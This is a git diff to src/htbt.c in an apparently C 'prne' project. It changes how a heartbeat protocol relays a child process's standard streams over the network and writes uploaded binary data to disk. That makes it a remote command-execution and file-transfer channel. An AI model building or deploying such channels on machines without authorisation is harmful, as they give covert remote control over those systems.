diff options
Diffstat (limited to 'src/htbt.c')
-rw-r--r-- | src/htbt.c | 188 |
1 files changed, 105 insertions, 83 deletions
@@ -368,12 +368,13 @@ static prne_htbt_status_code_t htbt_relay_child ( pfd[2].events = 0; } - pfd[3].events = 0; - pfd[4].events = 0; - if (ctx->iobuf[1].len == 0) { - if (pfd[3 + out_p].fd < 0) { - out_p = (out_p + 1) % 2; - } + if (ctx->iobuf[1].len == 0 && sh[1].len == 0) { + pfd[3].events = pfd[4].events = POLLIN; + } + else if (ctx->iobuf[1].len > 0) { + pfd[3].events = pfd[4].events = 0; + } + else if (sh[1].len) { pfd[3 + out_p].events = POLLIN; } @@ -399,44 +400,6 @@ static prne_htbt_status_code_t htbt_relay_child ( } // Handle events - if (!sh[0].fin && sh[0].len == 0) { - do { - if (prne_htbt_dser_msg_head( - ctx->iobuf[0].m, - ctx->iobuf[0].len, - &actual, - &mh) != PRNE_HTBT_SER_RC_OK) - { - break; - } - consume = actual; - if (mh.id != msg_id || - mh.is_rsp || - mh.op != PRNE_HTBT_OP_STDIO) - { - sh[0].fin = true; - break; - } - if (prne_htbt_dser_stdio( - ctx->iobuf[0].m + consume, - ctx->iobuf[0].len - consume, - &actual, - sh + 0) != PRNE_HTBT_SER_RC_OK) - { - break; - } - consume += actual; - prne_iobuf_shift(ctx->iobuf + 0, -consume); - } while (false); - - if (sh[0].len == 0 && pfd[0].fd < 0) { - // There's still pending stdin data and EOF. - // This is proto err. - ret = PRNE_HTBT_STATUS_PROTO_ERR; - break; - } - } - if (pfd[0].revents) { f_ret = ctx->read_f( ctx->ioctx, @@ -470,37 +433,21 @@ static prne_htbt_status_code_t htbt_relay_child ( } else { sh[1].len -= f_ret; - if (sh[1].len == 0) { - out_p = (out_p + 1) % 2; - } } } } - consume = prne_op_min(ctx->iobuf[0].len, sh[0].len); - if (pfd[2].fd < 0 && sh[0].len > 0) { - // Stdin data coming in, but the child has already closed stdin - prne_iobuf_shift(ctx->iobuf + 0, -consume); - sh[0].len -= consume; - } - else if (pfd[2].revents) { - f_ret = write(*c_in, ctx->iobuf[0].m, consume); - if (f_ret > 0) { - consume = f_ret; + if (ctx->iobuf[1].len == 0 && sh[1].len == 0) { + if (pfd[3].revents && pfd[4].revents) { + // round-robin stdout and stderr + out_p = (out_p + 1) % 2; } - else { - pfd[2].fd = -1; + else if (pfd[3].revents) { + out_p = 0; + } + else if (pfd[4].revents) { + out_p = 1; } - - prne_iobuf_shift(ctx->iobuf + 0, -consume); - sh[0].len -= consume; - } - - if (sh[0].fin && sh[0].len == 0 && pfd[2].fd >= 0) { - // End of stdin stream - close(*c_in); - *c_in = -1; - pfd[2].fd = -1; } if (pfd[3 + out_p].revents) { @@ -548,6 +495,70 @@ static prne_htbt_status_code_t htbt_relay_child ( prne_iobuf_shift(ctx->iobuf + 1, f_ret); } } + + if (!sh[0].fin && sh[0].len == 0) { + do { + if (prne_htbt_dser_msg_head( + ctx->iobuf[0].m, + ctx->iobuf[0].len, + &actual, + &mh) != PRNE_HTBT_SER_RC_OK) + { + break; + } + consume = actual; + if (mh.id != msg_id || + mh.is_rsp || + mh.op != PRNE_HTBT_OP_STDIO) + { + sh[0].fin = true; + break; + } + if (prne_htbt_dser_stdio( + ctx->iobuf[0].m + consume, + ctx->iobuf[0].len - consume, + &actual, + sh + 0) != PRNE_HTBT_SER_RC_OK) + { + break; + } + consume += actual; + prne_iobuf_shift(ctx->iobuf + 0, -consume); + } while (false); + + if (sh[0].len == 0 && pfd[0].fd < 0) { + // There's still pending stdin data and EOF. + // This is proto err. + ret = PRNE_HTBT_STATUS_PROTO_ERR; + break; + } + } + + consume = prne_op_min(ctx->iobuf[0].len, sh[0].len); + if (pfd[2].fd < 0 && sh[0].len > 0) { + // Stdin data coming in, but the child has already closed stdin + prne_iobuf_shift(ctx->iobuf + 0, -consume); + sh[0].len -= consume; + } + else if (pfd[2].revents) { + f_ret = write(*c_in, ctx->iobuf[0].m, consume); + if (f_ret > 0) { + consume = f_ret; + } + else { + pfd[2].fd = -1; + } + + prne_iobuf_shift(ctx->iobuf + 0, -consume); + sh[0].len -= consume; + } + + if (sh[0].fin && sh[0].len == 0 && pfd[2].fd >= 0) { + // End of stdin stream + close(*c_in); + *c_in = -1; + pfd[2].fd = -1; + } } prne_htbt_free_stdio(sh + 0); @@ -871,6 +882,9 @@ static void htbt_slv_fab_frame ( prne_assert(req <= ctx->iobuf[1].size); htbt_slv_consume_outbuf(ctx, req, ev); + if (!ctx->valid) { + return; + } if (PRNE_VERBOSE >= PRNE_VL_DBG0) { #if PRNE_DEBUG @@ -1176,14 +1190,14 @@ static bool htbt_slv_srv_bin ( pfd.fd = ctx->fd[0]; pfd.events = POLLIN; - while (bin_meta.bin_size > 0) { + while (bin_meta.bin_size > 0 || ctx->iobuf[0].len > 0) { pth_event_free(ev, FALSE); ev = pth_event( PTH_EVENT_TIME, prne_pth_tstimeout(HTBT_DL_TICK_TIMEOUT)); prne_assert(ev != NULL); - if (ctx->iobuf[0].len == 0) { + if (bin_meta.bin_size > 0 && ctx->iobuf[0].avail > 0) { f_ret = prne_pth_poll(&pfd, 1, -1, ev); if (pth_event_status(ev) == PTH_STATUS_OCCURRED || f_ret == 0) @@ -1196,27 +1210,35 @@ static bool htbt_slv_srv_bin ( if (pfd.revents) { f_ret = ctx->read_f( ctx->ioctx, - ctx->iobuf[0].m, - ctx->iobuf[0].avail); + ctx->iobuf[0].m + ctx->iobuf[0].len, + prne_op_min(bin_meta.bin_size, ctx->iobuf[0].avail)); if (f_ret <= 0) { if (f_ret < 0) { ctx->valid = false; } goto PROTO_ERR; } + if (PRNE_VERBOSE >= PRNE_VL_DBG0) { + prne_dbgpf( + HTBT_NT_SLV"@%"PRIuPTR": < bin dl %d bytes.\n", + (uintptr_t)ctx, + f_ret); + } prne_iobuf_shift(ctx->iobuf + 0, f_ret); + bin_meta.bin_size -= f_ret; } } - actual = prne_op_min(bin_meta.bin_size, ctx->iobuf[0].len); - // This blocks! - f_ret = write(fd, ctx->iobuf[0].m, actual); - prne_iobuf_shift(ctx->iobuf + 0, -actual); - bin_meta.bin_size -= actual; - if (f_ret < 0) { - ret_status = PRNE_HTBT_STATUS_ERRNO; - ret_errno = errno; - goto SND_STATUS; + if (ctx->iobuf[0].len > 0) { + // This blocks! + f_ret = write(fd, ctx->iobuf[0].m, ctx->iobuf[0].len); + if (f_ret < 0) { + ret_status = PRNE_HTBT_STATUS_ERRNO; + ret_errno = errno; + ctx->skip += bin_meta.bin_size; + goto SND_STATUS; + } + prne_iobuf_shift(ctx->iobuf + 0, -f_ret); } } close(fd); @@ -1268,7 +1290,7 @@ SND_STATUS: END: ctx->skip = bin_meta.bin_size; prne_htbt_free_bin_meta(&bin_meta); - if (path[0] != 0) { + if (path != NULL && path[0] != 0) { unlink(path); } prne_free(path); |